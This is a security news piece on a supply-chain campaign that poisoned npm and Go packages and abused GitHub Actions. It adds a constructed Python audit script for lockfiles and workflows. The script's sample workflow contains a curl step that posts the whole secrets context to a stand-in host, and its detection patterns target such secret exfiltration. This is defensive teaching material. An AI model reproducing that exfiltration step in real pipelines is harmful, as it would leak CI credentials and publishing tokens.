Cybersecurity researchers have identified a new phase of the supply chain campaign tied to the malware family known as Mini Shai-Hulud, Miasma, and Hades, which has compromised a fresh set of npm packages and expanded into the Go ecosystem. The latest activity includes malicious npm releases affecting the LeoPlatform and RStreams packages, alongside abuse of GitHub Actions workflows.

The attack leverages poisoned software dependencies to infiltrate development pipelines, a method that amplifies its reach by targeting widely used package registries: one malicious release is pulled automatically by every downstream project that resolves the package. A CVSS score does not apply here, since the problem is malicious code published through a trusted channel rather than a flaw in the packages' legitimate code, and the exploitation timeline has not been disclosed. The inclusion of GitHub Actions workflow abuse indicates a capability to compromise automated build and deployment processes, where CI secrets and publishing tokens are exposed to whatever code the pipeline runs.

Technical analysis reveals that Miasma propagates through malicious npm packages that embed code to harvest credentials or execute additional payloads. The expansion into Go packages suggests an effort to broaden the attack surface beyond Node.js environments. The indicators of compromise (IoCs) published so far are limited to the affected package names, LeoPlatform and RStreams; no hashes or malicious version numbers are given, so any recent release of those packages should be treated as suspect until the affected versions are confirmed. On the CI side, the signals to look for are workflow files that changed without a matching code review and workflow runs that nobody triggered.

npm and GitHub have not formally released a response at this time; because this is malicious code rather than a vulnerability, the remedy is removal of the bad versions from the registry and cleanup of affected projects, not a patch. Development teams are advised to audit their lockfiles (package-lock.json, go.sum) for these packages and to review GitHub Actions workflows for unauthorized changes, pinning third-party actions to commit SHAs rather than mutable tags. Security vendors recommend pinning package versions and enabling two-factor authentication on registry accounts. In practice, pinning means committing a lockfile and installing from it with npm ci rather than npm install; setting ignore-scripts=true in .npmrc additionally stops install-time hooks from running, which is the stage at which credential-harvesting packages typically execute. Any registry or CI token that was present on a machine or runner that installed a suspect version should be rotated.
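The following is an added example of the audit described in the two preceding paragraphs (checking dependencies for the named packages and reviewing workflows for tampering); it is not code from the researchers or from any of the projects named on this page. It checks a package-lock.json and a go.sum against a watchlist and flags the GitHub Actions patterns a reviewer looks for after a CI compromise: third-party actions not pinned to a commit SHA, pull_request_target workflows that check out the pull request head, and steps that serialize or ship the secrets context. The watchlist entries and the sample files are constructed; the page does not give the exact npm or Go identifiers of the affected LeoPlatform and RStreams packages, so the names used here are placeholders to be replaced from a trusted advisory.

```python
import json
import re

# Constructed watchlist (assumption): the page names LeoPlatform and RStreams
# but not the exact npm package or Go module identifiers, so these are
# placeholders to be replaced with names from a trusted advisory.
WATCHLIST = {
    "npm": {"example-leoplatform-sdk", "example-rstreams-sdk"},
    "go": {"example.com/rstreams/sdk"},
}


def audit_npm_lockfile(lock_text, watchlist=WATCHLIST):
    """Return sorted (name, version) pairs for watchlisted packages in a
    package-lock.json, covering both the v2/v3 'packages' map and the
    v1-style nested 'dependencies' tree."""
    lock = json.loads(lock_text)
    hits = set()
    for path, meta in lock.get("packages", {}).items():
        if not path:  # "" is the root project itself
            continue
        # Nested installs look like node_modules/a/node_modules/@scope/b
        name = meta.get("name") or path.rsplit("node_modules/", 1)[-1]
        if name in watchlist["npm"]:
            hits.add((name, meta.get("version")))

    def walk(deps):
        for name, meta in deps.items():
            if name in watchlist["npm"]:
                hits.add((name, meta.get("version")))
            walk(meta.get("dependencies", {}))

    walk(lock.get("dependencies", {}))
    return sorted(hits)


def audit_go_sum(sum_text, watchlist=WATCHLIST):
    """Return sorted (module, version) pairs for watchlisted modules in go.sum.
    Each module appears twice (content hash and /go.mod hash); both collapse
    to one finding."""
    hits = set()
    for line in sum_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        module, version, _digest = parts
        if module in watchlist["go"]:
            hits.add((module, version.removesuffix("/go.mod")))
    return sorted(hits)


_USES = re.compile(r"^\s*-?\s*uses:\s*([^\s#]+)", re.M)
_SHA_PIN = re.compile(r"@[0-9a-f]{40}$")
_SECRET_REF = re.compile(r"toJSON\(\s*secrets\s*\)|secrets\.[A-Za-z_]")


def audit_workflow(yaml_text):
    """Return (code, detail) findings for risky workflow patterns. Plain text
    matching is deliberate: it needs no YAML library and works on a raw diff."""
    findings = []
    for m in _USES.finditer(yaml_text):
        ref = m.group(1)
        if ref.startswith(("./", "docker://")):
            continue  # local or image actions are not tag-pinned
        if not _SHA_PIN.search(ref):
            findings.append(("unpinned-action", ref))
    if (re.search(r"\bpull_request_target\b", yaml_text)
            and re.search(r"github\.event\.pull_request\.head", yaml_text)):
        findings.append(("prt-head-checkout",
                         "pull_request_target runs PR head code with secrets"))
    if re.search(r"toJSON\(\s*secrets\s*\)", yaml_text):
        findings.append(("secrets-dump", "whole secrets context serialized"))
    for line in yaml_text.splitlines():
        if re.search(r"\b(curl|wget)\b", line) and _SECRET_REF.search(line):
            findings.append(("secrets-exfil", line.strip()))
    return findings


# Constructed sample inputs (not real project files).
SAMPLE_LOCK = json.dumps({
    "name": "demo", "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo", "version": "1.0.0"},
        "node_modules/express": {"version": "4.19.2"},
        "node_modules/example-leoplatform-sdk": {"version": "2.3.1"},
        "node_modules/foo/node_modules/example-rstreams-sdk": {"version": "0.9.0"},
    },
})

SAMPLE_GO_SUM = """\
github.com/stretchr/testify v1.9.0 h1:AAAA=
example.com/rstreams/sdk v1.4.2 h1:BBBB=
example.com/rstreams/sdk v1.4.2/go.mod h1:CCCC=
"""

SAMPLE_WORKFLOW = """\
name: ci
on:
  pull_request_target:
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - uses: actions/setup-node@0123456789abcdef0123456789abcdef01234567
      - run: npm ci
      - run: curl -s -X POST --data "${{ toJSON(secrets) }}" https://example.invalid/c
"""

if __name__ == "__main__":
    print(audit_npm_lockfile(SAMPLE_LOCK))
    print(audit_go_sum(SAMPLE_GO_SUM))
    for code, detail in audit_workflow(SAMPLE_WORKFLOW):
        print(f"{code}: {detail}")
```

Run it against real files by replacing the SAMPLE_* constants with the contents of package-lock.json, go.sum, and each file under .github/workflows; a clean repository produces empty lists. The workflow checks are heuristics on text, so a hit is a prompt for review rather than proof of compromise, but a match on the watchlist means the package was resolved and its install scripts may already have run on that machine.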

The malware family, previously associated with attacks on open-source ecosystems, continues to evolve its tactics. Attribution remains unclear, but the supply chain vector underscores persistent threats to software development infrastructure.